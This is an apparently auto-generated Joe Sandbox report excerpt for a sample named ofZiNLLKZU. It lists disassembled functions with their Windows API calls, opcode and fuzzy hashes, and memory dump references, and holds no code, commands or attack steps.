                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 3488606520-0
                                                                                • Opcode ID: b492a60392a1f89b5044e8c3fea4e7edd7973921dac822e5f13bfcf6705ce475
                                                                                • Instruction ID: fc8e90df49893e20ff1b8d3456d53c3293360ea1aed867ebd6ef00189baef4d6
                                                                                • Opcode Fuzzy Hash: b492a60392a1f89b5044e8c3fea4e7edd7973921dac822e5f13bfcf6705ce475
                                                                                • Instruction Fuzzy Hash: C4A180716043029FD720DF18C885B6ABBE6AF84714F14891DF9999B3D2D7B0EC45CB51
                                                                                Function 0060BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00673700), ref: 0060BB91
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,006A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0060BC09
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,006A1270,000000FF,?,0000003F,00000000,?), ref: 0060BC36
                                                                                • _free.LIBCMT ref: 0060BB7F
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 0060BD4B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                • String ID:
                                                                                • API String ID: 1286116820-0
                                                                                • Opcode ID: 76c0f0e4ffe253267bbb8b2afc0333f15df7ce8745b4c9a1d1d4fd159075d81d
                                                                                • Instruction ID: b7b6b3c21c376fdfb20e5daaa512a5bf3dd5e5b18939532711f5743e650c25fd
                                                                                • Opcode Fuzzy Hash: 76c0f0e4ffe253267bbb8b2afc0333f15df7ce8745b4c9a1d1d4fd159075d81d
                                                                                • Instruction Fuzzy Hash: BD512B718802099FDB18EF659C419AFB7BEEF42320F10926EE450D72D1EB709E818B54
                                                                                Function 0063E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0063DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0063CF22,?), ref: 0063DDFD
                                                                                  • Part of subcall function 0063DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0063CF22,?), ref: 0063DE16
                                                                                  • Part of subcall function 0063E199: GetFileAttributesW.KERNEL32(?,0063CF95), ref: 0063E19A
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0063E473
                                                                                • MoveFileW.KERNEL32(?,?), ref: 0063E4AC
                                                                                • _wcslen.LIBCMT ref: 0063E5EB
                                                                                • _wcslen.LIBCMT ref: 0063E603
                                                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0063E650
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3183298772-0
                                                                                • Opcode ID: 2278173a58fbff88c00a8fcee2c47c53c658ff236056a73059d56cf458ca0739
                                                                                • Instruction ID: a55a551998a605c81b68eb8d4718b6d84337c9d9473687f2af9d45927a6fb93e
                                                                                • Opcode Fuzzy Hash: 2278173a58fbff88c00a8fcee2c47c53c658ff236056a73059d56cf458ca0739
                                                                                • Instruction Fuzzy Hash: BE51C5B24083455BC724DB90DC859EF77DDAF84300F00091EF689D3192EF75A58887AA
                                                                                Function 0065B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 0065C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065B6AE,?,?), ref: 0065C9B5
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065C9F1
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA68
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0065BAA5
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0065BB00
                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0065BB63
                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 0065BBA6
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0065BBB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 826366716-0
                                                                                • Opcode ID: d07cb4822262e53d463e37fbfd10c108e1876d555a3c81376dbf74aea4781f52
                                                                                • Instruction ID: da35d82b0460b75acbb10950e8d5ba51d7928900fb75fbac6365f22338bf70d0
                                                                                • Opcode Fuzzy Hash: d07cb4822262e53d463e37fbfd10c108e1876d555a3c81376dbf74aea4781f52
                                                                                • Instruction Fuzzy Hash: 8D61B031208242AFD314DF14C494E6ABBE6FF84318F14955DF8998B3A2DB71ED49CB92
                                                                                Function 00638BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00638BCD
                                                                                • VariantClear.OLEAUT32 ref: 00638C3E
                                                                                • VariantClear.OLEAUT32 ref: 00638C9D
                                                                                • VariantClear.OLEAUT32(?), ref: 00638D10
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00638D3B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                • String ID:
                                                                                • API String ID: 4136290138-0
                                                                                • Opcode ID: d0bf2db6c4c18240826a6999e824fa6a6913201f551f2fa9c180fd51721f69fe
                                                                                • Instruction ID: dedfed6754a5979168a74064d0075ff2839d2efe078d474640897da3bb65d57e
                                                                                • Opcode Fuzzy Hash: d0bf2db6c4c18240826a6999e824fa6a6913201f551f2fa9c180fd51721f69fe
                                                                                • Instruction Fuzzy Hash: 405136B5A00619AFCB14CF68C894AAAB7F9FF89310F158559F905DB350EB30E911CBA0
                                                                                Function 00648AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00648BAE
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00648BDA
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00648C32
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00648C57
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00648C5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                • String ID:
                                                                                • API String ID: 2832842796-0
                                                                                • Opcode ID: 6094e4cf0549da325dba7b10e18b8760f23da75e3a21b1b48c222c3228964b62
                                                                                • Instruction ID: 7adcdba04cf82268f04b39bd60f56620f20d4b93f02e3ef433408a219063e19a
                                                                                • Opcode Fuzzy Hash: 6094e4cf0549da325dba7b10e18b8760f23da75e3a21b1b48c222c3228964b62
                                                                                • Instruction Fuzzy Hash: 88515F35A002199FCB14DF65C884AADBBF6FF48314F08805AE849AB362DB31ED41CB91
                                                                                Function 00658EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00658F40
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00658FD0
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00658FEC
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00659032
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00659052
                                                                                  • Part of subcall function 005EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00641043,?,7735E610), ref: 005EF6E6
                                                                                  • Part of subcall function 005EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0062FA64,00000000,00000000,?,?,00641043,?,7735E610,?,0062FA64), ref: 005EF70D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                • String ID:
                                                                                • API String ID: 666041331-0
                                                                                • Opcode ID: 3e2e332795522f4f9d496444892963e07d394c8984cd753cf02cb594d1508dff
                                                                                • Instruction ID: a9bc2b3c26635eb7ea41b42f0951e60a5ee56f62f5d9ed3ec04eee09fb4e4ec9
                                                                                • Opcode Fuzzy Hash: 3e2e332795522f4f9d496444892963e07d394c8984cd753cf02cb594d1508dff
                                                                                • Instruction Fuzzy Hash: C2513C35600206DFC715DF58C4948ADBBB2FF89325F05809AE845AB762DB31ED8ACF91
                                                                                Function 00666B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00666C33
                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 00666C4A
                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00666C73
                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0064AB79,00000000,00000000), ref: 00666C98
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00666CC7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MessageSendShow
                                                                                • String ID:
                                                                                • API String ID: 3688381893-0
                                                                                • Opcode ID: e1dd12fb7c0fd102e8e6c196118750fc66536d9265fc274fbe5b547af298bec9
                                                                                • Instruction ID: c06cd98c614292af5253cf916d3ef9f74262638e7629fb3ddbbaed3783f9b74b
                                                                                • Opcode Fuzzy Hash: e1dd12fb7c0fd102e8e6c196118750fc66536d9265fc274fbe5b547af298bec9
                                                                                • Instruction Fuzzy Hash: 3041B435604504AFDB24DF28DC58FFA7FAAEB0A360F150269F895A73E0C371AD51CA90
                                                                                Function 00602051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 7a4729bc28fbade243fa1b7caae614bddbf1b4226137c1897e0572ae99b5e430
                                                                                • Instruction ID: ee715d8c7bcc5e371e03231c8bbb8b319c4fd1f7ec9620ee49353d7fb15d37e8
                                                                                • Opcode Fuzzy Hash: 7a4729bc28fbade243fa1b7caae614bddbf1b4226137c1897e0572ae99b5e430
                                                                                • Instruction Fuzzy Hash: 9A41E632A403019FCB28DF78C894A9EB7B6EF89314F1545A9E615EB391DA31AD01CB80
                                                                                Function 005E912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 005E9141
                                                                                • ScreenToClient.USER32(00000000,?), ref: 005E915E
                                                                                • GetAsyncKeyState.USER32(00000001), ref: 005E9183
                                                                                • GetAsyncKeyState.USER32(00000002), ref: 005E919D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                • String ID:
                                                                                • API String ID: 4210589936-0
                                                                                • Opcode ID: 8472659fa6a8bc3bce704a774992b712f72d606d59d9125654cd838167b7c05d
                                                                                • Instruction ID: 471503d285b6772bbd02fdd6c324b19f78d3ae90830ffe4bb566e44a857284b8
                                                                                • Opcode Fuzzy Hash: 8472659fa6a8bc3bce704a774992b712f72d606d59d9125654cd838167b7c05d
                                                                                • Instruction Fuzzy Hash: 3C41707190891BFBDF099F65D848BEEBB75FF45324F248219E469A3290C7305960CF91
                                                                                Function 00643874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 006438CB
                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00643922
                                                                                • TranslateMessage.USER32(?), ref: 0064394B
                                                                                • DispatchMessageW.USER32(?), ref: 00643955
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00643966
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                • String ID:
                                                                                • API String ID: 2256411358-0
                                                                                • Opcode ID: d443fe160682bc3f8bde592a4943e9e496e72bda2905e2eacc56c384cbfa66ab
                                                                                • Instruction ID: d3edcf035987d0f1f7f0a1f87aecc6083898837291757ac9c168013471c58f57
                                                                                • Opcode Fuzzy Hash: d443fe160682bc3f8bde592a4943e9e496e72bda2905e2eacc56c384cbfa66ab
                                                                                • Instruction Fuzzy Hash: 1A31C8709043669EEB25DB349848BF677ABAB06304F04055DD4A2863A0F3F4A685CF11
                                                                                Function 0064CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0064C21E,00000000), ref: 0064CF38
                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 0064CF6F
                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,0064C21E,00000000), ref: 0064CFB4
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0064C21E,00000000), ref: 0064CFC8
                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0064C21E,00000000), ref: 0064CFF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                • String ID:
                                                                                • API String ID: 3191363074-0
                                                                                • Opcode ID: dc9d7c998699bc1c6a5150d4d9771e6f6acfa216239cb8ad1df53f81d2606581
                                                                                • Instruction ID: 6892af04e642290540eb3d244fabca7b82d2d5246c5f8c0a05cc74b45b30b010
                                                                                • Opcode Fuzzy Hash: dc9d7c998699bc1c6a5150d4d9771e6f6acfa216239cb8ad1df53f81d2606581
                                                                                • Instruction Fuzzy Hash: 91317C71601605EFDBA4DFA5C884AABBBFAEF14320B10442EF546D2301DB34AE45DB60
                                                                                Function 00631901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 00631915
                                                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 006319C1
                                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 006319C9
                                                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 006319DA
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 006319E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: 21d3418361c7f15dd6832e738755a4dc92918e25d3a547ac8bc270fce67db6fd
                                                                                • Instruction ID: b71a29a15e065c03ded6b51f5aeb36199f0244286082531a13eb7ae96b40a130
                                                                                • Opcode Fuzzy Hash: 21d3418361c7f15dd6832e738755a4dc92918e25d3a547ac8bc270fce67db6fd
                                                                                • Instruction Fuzzy Hash: 1F31C271900219EFCB04CFA8CD99BEE7BB6EB45325F104229F961EB2D1C7B09954DB90
                                                                                Function 00665706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00665745
                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 0066579D
                                                                                • _wcslen.LIBCMT ref: 006657AF
                                                                                • _wcslen.LIBCMT ref: 006657BA
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00665816
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$_wcslen
                                                                                • String ID:
                                                                                • API String ID: 763830540-0
                                                                                • Opcode ID: aa28f0b840b33132a9f6678c5a167e13b937a3e5b26d680d29651847fdd96002
                                                                                • Instruction ID: c6cf3dfe9260e05c490ca0398d6ffd371114c2bfc3b348631c2ef02bae4ee7c5
                                                                                • Opcode Fuzzy Hash: aa28f0b840b33132a9f6678c5a167e13b937a3e5b26d680d29651847fdd96002
                                                                                • Instruction Fuzzy Hash: 8A21D871904619DADB209F60CC86AEE7BBAFF44724F108256F92AEB2C0D7749985CF50
                                                                                Function 00650930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 00650951
                                                                                • GetForegroundWindow.USER32 ref: 00650968
                                                                                • GetDC.USER32(00000000), ref: 006509A4
                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 006509B0
                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 006509E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
                                                                                • API String ID: 4156661090-0
                                                                                • Opcode ID: 0ea1e90ebf6bfabf14000e2989313fc823f9c234ce65668d6d027ac3337dd96a
